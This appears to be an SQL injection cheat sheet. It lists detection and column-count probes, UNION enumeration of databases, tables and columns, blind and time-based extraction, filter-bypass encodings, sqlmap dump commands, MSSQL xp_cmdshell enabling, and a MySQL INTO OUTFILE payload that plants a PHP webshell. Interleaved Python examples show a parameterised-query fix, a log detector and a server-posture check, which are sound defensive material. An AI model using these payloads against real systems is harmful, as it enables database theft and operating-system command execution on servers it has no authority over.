Useful
Detection
----------------------------------------------
| ' | " | ` | ') | ") | `) | ')) | ")) | `)) |
----------------------------------------------
#comment
--comment
-- comment    // space required
/*comment*/
/*! MYSQL Special SQL */
' OR 1=1 -- -
' OR 1=1 --
' OR '1'='1
'XOR(if(now()=sysdate(),sleep(10),0))OR'
Simple SQL query
SELECT a,0 FROM 0xtable WHERE name = 'test'
Find the number of columns
1' ORDER BY 1--+ #True
1' ORDER BY 2--+ #True
1' ORDER BY 3--+ #True <<< OK
1' ORDER BY 4--+ #False
1' GROUP BY 1--+ #True
1' GROUP BY 2--+ #True
1' GROUP BY 3--+ #True <<< OK
1' GROUP BY 4--+ #False
1' UNION SELECT null-- Doesn't work
1' UNION SELECT null,null-- Doesn't work
1' UNION SELECT null,null,null-- Works <<< OK
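The detection payloads and the ORDER BY / UNION column-count probe above, run against a string-concatenated query and against its parameterised replacement. This is an added example, not code from the original sheet; it uses Python's built-in sqlite3 with a constructed in-memory users table (table name, columns and rows are invented for the demo). The point for the defender: the payloads that enumerate columns and pull rows out of the concatenated query are bound as an ordinary string by the parameterised one and match nothing.

```python
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed in-memory table so the example runs offline (demo data)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT, secret TEXT)")
    conn.executemany(
        "INSERT INTO users (name, secret) VALUES (?, ?)",
        [("alice", "s3cret-a"), ("bob", "s3cret-b"), ("carol", "s3cret-c")],
    )
    return conn


def lookup_vulnerable(conn: sqlite3.Connection, name: str) -> list:
    """Deliberately injectable: the input is spliced into the SQL text, so the
    quote, the OR/UNION clause and the trailing -- all reach the parser."""
    sql = f"SELECT id, name FROM users WHERE name = '{name}'"
    return conn.execute(sql).fetchall()


def lookup_safe(conn: sqlite3.Connection, name: str) -> list:
    """Hardened form: the input is bound as a parameter and is only ever a value."""
    return conn.execute("SELECT id, name FROM users WHERE name = ?", (name,)).fetchall()


def run_both(conn: sqlite3.Connection, payload: str):
    """Run one payload through both lookups. A parse error on the vulnerable
    side is returned as the string 'error', because that True/False difference
    is exactly what the ORDER BY n probe reads the column count from."""
    try:
        vuln = lookup_vulnerable(conn, payload)
    except sqlite3.OperationalError:
        vuln = "error"
    return vuln, lookup_safe(conn, payload)


# A normal value plus the sheet's probes (two-column query, so ORDER BY 3 fails).
PAYLOADS = [
    "alice",
    "' OR '1'='1",
    "' ORDER BY 2--",
    "' ORDER BY 3--",
    "' UNION SELECT id, secret FROM users--",
]


def demo_results() -> dict:
    """Every payload in PAYLOADS against a fresh demo database: payload -> (vulnerable, safe)."""
    conn = make_db()
    return {p: run_both(conn, p) for p in PAYLOADS}


if __name__ == "__main__":
    for payload, (vuln, safe) in demo_results().items():
        print(repr(payload), "vulnerable:", vuln, "| safe:", safe)
```

The safe lookup never errors and never returns more than the literal name matches, which is also why the ORDER BY probe cannot be read off it.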
List databases
' UNION SELECT 0,schema_name,0 FROM information_schema.schemata
List tables
' UNION SELECT 0,table_name,0 FROM information_schema.tables WHERE table_schema=<database>
List columns
' UNION SELECT 0,column_name,0 FROM information_schema.columns WHERE table_name=<table>
Dump the entire database
SELECT '',database_to_xml(true, true, '')::text,''  -- PostgreSQL
Extract without knowing the column names
SELECT * FROM 0xtable
SELECT 0,*,0 FROM 0xtable
# Extract the 3rd column of 0xtable
SELECT 0,T.3,0 FROM (SELECT 1, 2, 3, .. , size_of_0xtable UNION SELECT * FROM 0xtable ) T;
Blind SQLi
Returns true if a match is found.
SELECT SUBSTR(name,1,1) = 'A' FROM 0xtable
SELECT SUBSTR(name,1,1) = 'B' FROM 0xtable
SELECT SUBSTR(name,1,1) = 'C' FROM 0xtable
...
SELECT SUBSTR(name,5,1) = 'A' FROM 0xtable
SELECT SUBSTR(name,5,1) = 'B' FROM 0xtable
SELECT SUBSTR(name,5,1) = 'C' FROM 0xtable
Time-based SQLi
The query takes longer to process if a match is found.
SELECT sleep(10) FROM 0xtable WHERE SUBSTR(name,1,1) = 'A'
SELECT sleep(10) FROM 0xtable WHERE SUBSTR(name,1,1) = 'B'
SELECT sleep(10) FROM 0xtable WHERE SUBSTR(name,1,1) = 'C'
...
SELECT sleep(10) FROM 0xtable WHERE SUBSTR(name,5,1) = 'A'
SELECT sleep(10) FROM 0xtable WHERE SUBSTR(name,5,1) = 'B'
SELECT sleep(10) FROM 0xtable WHERE SUBSTR(name,5,1) = 'C'
Filter bypass
No spaces
?id=1%09and%091=1%09--
?id=1%0Dand%0D1=1%0D--
?id=1%0Cand%0C1=1%0C--
?id=1%0Band%0B1=1%0B--
?id=1%0Aand%0A1=1%0A--
?id=1%A0and%A01=1%A0--
?id=1/*comment*/and/**/1=1/**/--
?id=(1)and(1)=(1)--
No commas
LIMIT 0,1 -> LIMIT 1 OFFSET 0
SUBSTR('SQL',1,1) -> SUBSTR('SQL' FROM 1 FOR 1)
SELECT 1,2,3,4 -> UNION SELECT * FROM (SELECT 1)a JOIN (SELECT 2)b JOIN (SELECT 3)c JOIN (SELECT 4)d
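The whitespace and comment variants above, like the sleep-based payloads in the blind sections earlier, only defeat a filter that compares raw bytes. The following added example (not from the original sheet) canonicalises a query string before matching: percent-decoding, MySQL /*!...*/ conditional comments kept because the server executes them, plain comments removed, every whitespace byte collapsed to one space. It then applies a few indicator rules and runs them over constructed access-log lines. The rule names, the LOG_LINES sample and the latin-1 decoding choice are assumptions of this demo.

```python
import re
from urllib.parse import unquote_plus

# MySQL executes the body of /*! ... */ conditional comments, so keep that body;
# ordinary /* ... */ comments are dropped (they are the "no space" substitute).
_COND_COMMENT = re.compile(r"/\*!\d*(.*?)\*/", re.S)
_PLAIN_COMMENT = re.compile(r"/\*.*?\*/", re.S)

# Indicator rules applied to the canonical form (rule names assumed for this demo).
RULES = {
    # or/and followed by x = x, with optional quotes or parentheses around x
    "tautology": re.compile(r"\b(?:or|and)\b\s*\(?\s*'?(\w+)'?\s*\)?\s*=\s*\(?\s*'?\1'?"),
    "union_select": re.compile(r"\bunion\b(?:\s+all)?\s+select\b"),
    "schema_probe": re.compile(r"\binformation_schema\b"),
    "time_delay": re.compile(r"\b(?:sleep|benchmark|pg_sleep|waitfor)\b"),
}


def canonicalize(raw: str) -> str:
    """Fold the encoding, comment and whitespace variants onto one form.

    latin-1 decoding keeps %A0 as the single byte 0xA0 (a non-breaking space,
    which the sheet lists as an accepted separator); str.split() treats
    \\t \\n \\v \\f \\r and \\xa0 alike, so every variant collapses to one ' '.
    """
    s = unquote_plus(raw, encoding="latin-1")
    s = _COND_COMMENT.sub(r" \1 ", s)
    s = _PLAIN_COMMENT.sub(" ", s)
    return " ".join(s.split()).lower()


def classify(raw: str) -> list:
    """Names of the rules that fire on the canonical form of one parameter string."""
    canon = canonicalize(raw)
    return [name for name, rx in RULES.items() if rx.search(canon)]


# Constructed access-log request lines (demo data, not a real capture).
LOG_LINES = [
    "GET /item.php?id=42 HTTP/1.1",
    "GET /item.php?id=1%09and%091=1%09-- HTTP/1.1",
    "GET /item.php?id=1/*comment*/and/**/1=1/**/-- HTTP/1.1",
    "GET /item.php?id=(1)and(1)=(1)-- HTTP/1.1",
    "GET /item.php?id=1%27%20UNION%20SELECT%200,schema_name,0%20FROM%20information_schema.schemata HTTP/1.1",
    "GET /search.php?q=%27XOR(if(now()=sysdate(),sleep(10),0))OR%27 HTTP/1.1",
    "GET /search.php?q=rock+and+roll HTTP/1.1",
]


def scan_log(lines) -> dict:
    """Map line index -> firing rules, for every request whose query string fires."""
    hits = {}
    for i, line in enumerate(lines):
        m = re.search(r"\?(\S*)", line)
        if not m:
            continue
        found = classify(m.group(1))
        if found:
            hits[i] = found
    return hits


if __name__ == "__main__":
    for i, names in scan_log(LOG_LINES).items():
        print(i, names, "<-", LOG_LINES[i])
```

Because matching happens on the canonical form, the tab, carriage-return, form-feed, vertical-tab, newline, 0xA0 and comment variants of the same probe all produce one identical string and one alert; the benign "rock and roll" search does not fire because the tautology rule requires the x = x shape.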
SQLMAP
Unauthenticated
Scan:
sqlmap -u "<url>"
Enumerate databases:
sqlmap -u "<url>" --dbs
Enumerate tables:
sqlmap -u "<url>" -D <database> --tables
Dump a table:
sqlmap -u "<url>" -D <database> -T <table> --dump
Dump the database:
sqlmap -u "<url>" --dump
Authenticated
Generate an HTTP request from the vulnerable form and capture its contents (with Burp Suite or the browser). Save the contents to a file request.txt:
POST /dashboard.php HTTP/1.1
Host: 10.10.195.229
Content-Length: 15
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://10.10.195.229
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.93 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://10.10.195.229/dashboard.php
Accept-Encoding: gzip, deflate
Accept-Language: fr-FR,fr;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: PHPSESSID=h12mn21j4k6dl7d0997qsvuj64
Connection: close
search=test
Run sqlmap, passing it the request file and the database type:
sqlmap -r <request.txt> --dump
Execution
MSSQL
Interactive
EXECUTE sp_configure 'show advanced options', 1;
RECONFIGURE;
EXECUTE sp_configure 'xp_cmdshell', 1;
RECONFIGURE;
EXECUTE xp_cmdshell 'whoami';
Injection:
Does not return the command's output.
'; EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE; --
'; EXECUTE xp_cmdshell "<command>"; --
MySQL
Injection:
' UNION ALL SELECT NULL,'<?php system($_GET["cmd"]);?>',NULL INTO OUTFILE '/var/www/html/tmp/webshell.php'-- -
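Both execution primitives above depend on server configuration: INTO OUTFILE can only land a file in the webroot if MySQL's secure_file_priv allows writes there, and xp_cmdshell only runs while its sp_configure run_value is 1. The added example below (not from the original sheet) turns those two settings into a posture verdict and flags the same primitives in constructed database-audit lines. The AUDIT_LINES sample, the function names and the default webroot path are assumptions of this demo.

```python
import re
from os.path import normpath

# Server-side primitives the execution payloads rely on (MySQL and MSSQL).
EXEC_PRIMITIVES = re.compile(
    r"\b(?:xp_cmdshell|sp_configure|into\s+(?:outfile|dumpfile)|load_file)\b", re.I
)


def _inside(child: str, parent: str) -> bool:
    """True when child is parent or lies beneath it (both paths normalised)."""
    child, parent = normpath(child), normpath(parent)
    return child == parent or child.startswith(parent.rstrip("/") + "/")


def assess_secure_file_priv(value, webroot: str = "/var/www/html") -> tuple:
    """Read MySQL's secure_file_priv the way the server does.

    None (SQL NULL) -> INTO OUTFILE / LOAD DATA are disabled entirely
    ''              -> no restriction: any directory the mysqld OS user can write
    a directory     -> exports confined to that directory
    The webroot argument (assumed path) lets the check flag the one case the
    webshell payload needs: a writable export directory that is also served.
    """
    if value is None:
        return ("ok", "secure_file_priv is NULL: file export disabled")
    if value == "":
        return ("high", "secure_file_priv is empty: files can be written anywhere "
                        "the mysqld user can write, including the webroot")
    if _inside(webroot, value) or _inside(value, webroot):
        return ("high", f"export directory {value} overlaps the webroot {webroot}")
    return ("low", f"exports confined to {value}; confirm the web server does not serve it")


def assess_xp_cmdshell(run_values: dict) -> tuple:
    """run_values maps an sp_configure option name to its run_value (the value
    in effect, as opposed to config_value, which is pending until RECONFIGURE)."""
    if run_values.get("xp_cmdshell") == 1:
        return ("high", "xp_cmdshell is enabled: an injection into this instance "
                        "becomes OS command execution")
    if run_values.get("show advanced options") == 1:
        return ("medium", "advanced options exposed; a sufficiently privileged login "
                          "can enable xp_cmdshell with one sp_configure call")
    return ("ok", "xp_cmdshell disabled")


# Constructed database audit lines (demo data, not a real capture).
AUDIT_LINES = [
    "2024-01-01T10:00:00Z app_ro SELECT id, name FROM products WHERE id = 42",
    "2024-01-01T10:00:05Z app_ro SELECT id, name FROM products WHERE id = '' UNION ALL "
    "SELECT NULL,'...',NULL INTO OUTFILE '/var/www/html/tmp/webshell.php'-- -",
    "2024-01-01T10:01:00Z sa EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;",
]


def scan_audit(lines) -> list:
    """(line index, first primitive seen) for each audit line that names one."""
    found = []
    for i, line in enumerate(lines):
        m = EXEC_PRIMITIVES.search(line)
        if m:
            found.append((i, m.group(0)))
    return found


if __name__ == "__main__":
    print(assess_secure_file_priv(""))
    print(assess_secure_file_priv("/var/lib/mysql-files/"))
    print(assess_xp_cmdshell({"show advanced options": 1, "xp_cmdshell": 1}))
    print(scan_audit(AUDIT_LINES))
```

An application login that only needs SELECT on its own tables has no business with FILE privilege on MySQL or with sp_configure on MSSQL; the posture checks above are the quickest way to see whether an injection in the web tier would stop at data exposure or continue to the operating system.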